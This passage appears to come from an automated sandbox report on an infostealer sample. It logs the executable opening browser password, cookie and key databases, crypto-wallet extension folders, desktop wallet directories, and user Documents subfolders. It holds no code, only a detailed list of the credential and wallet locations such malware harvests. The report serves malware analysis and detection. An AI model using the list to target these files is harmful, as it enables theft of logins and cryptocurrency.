            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
